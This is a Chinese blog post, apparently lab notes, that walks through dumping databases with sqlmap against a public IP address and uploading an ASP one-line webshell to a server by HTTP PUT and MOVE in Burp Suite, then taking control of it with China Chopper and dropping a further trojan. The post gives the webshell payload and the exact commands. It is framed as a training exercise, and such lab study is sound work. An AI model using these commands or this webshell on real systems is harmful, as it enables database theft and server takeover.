(9)SQL注入漏洞(实验)
2021/9/17 2:06:26
本文主要是介绍(9)SQL注入漏洞(实验),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
2021-9-16
--续
六、脱库(ctrl+c退出)
脱数据库
--dump-all
sqlmap -u "http://106.52.39.144/Less-1/?id=1" --dump-all (脱所有数据库,动静太大,不能随便脱)
sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security --dump (一般用这个)
七、调线程
--thread 调线程 范围1-10
sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security --dump --thread 10
--batch 不会再跳出询问选择 ,按照默认选择进行选择
sqlmap -u "http://106.52.39.144/Less-1/?id=1" --dump-all --thread 10 --batch
实验查网页漏洞
一、所用信息
网站IP:192.168.1.62
病毒:一句话木马病毒(<%eval request("chopper")%>)
菊花马(文件)
Burpsuit所用命令:OPTION(看)
PUT (传)
MOVE (改)
Destination:http://192.168.1.62/1.asp
所用工具:burpsuit、菜刀
二、实验步骤
1、先将192.168.1.62在burpsuit中进行(proxy)抓包——右击-REPEATER-RESPONSE
2、用(options)命令看允许的命令。将第一行前缀改成OPTIONS-看里面允许了什么-右面那一栏-倒数二三行
3、再用put命令上传文件。
改的命令为:(1)、将txt文件的文件名改成xjj
- 、将Destination:http://192.168.1.62/1.asp插入user命令下面
- 、在最后一行空一行加入一句话木马(密码可以自己设)
- MOVE命令来改txt命令的后缀名
- 将DISTINATION后面的域名复制下来-添加进菜刀并输入密码-双击-拖入菊花马程序
6、再次进入网站-输入密码-即成功
这篇关于(9)SQL注入漏洞(实验)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-29设计Element UI表单组件居然如此简单!
- 2024-12-28一步到位:购买适合 SEO 的域名全攻略
- 2024-12-27OpenFeign服务间调用学习入门
- 2024-12-27OpenFeign服务间调用学习入门
- 2024-12-27OpenFeign学习入门:轻松掌握微服务通信
- 2024-12-27OpenFeign学习入门:轻松掌握微服务间的HTTP请求
- 2024-12-27JDK17新特性学习入门:简洁教程带你轻松上手
- 2024-12-27JMeter传递token学习入门教程
- 2024-12-27JMeter压测学习入门指南
- 2024-12-27JWT单点登录学习入门指南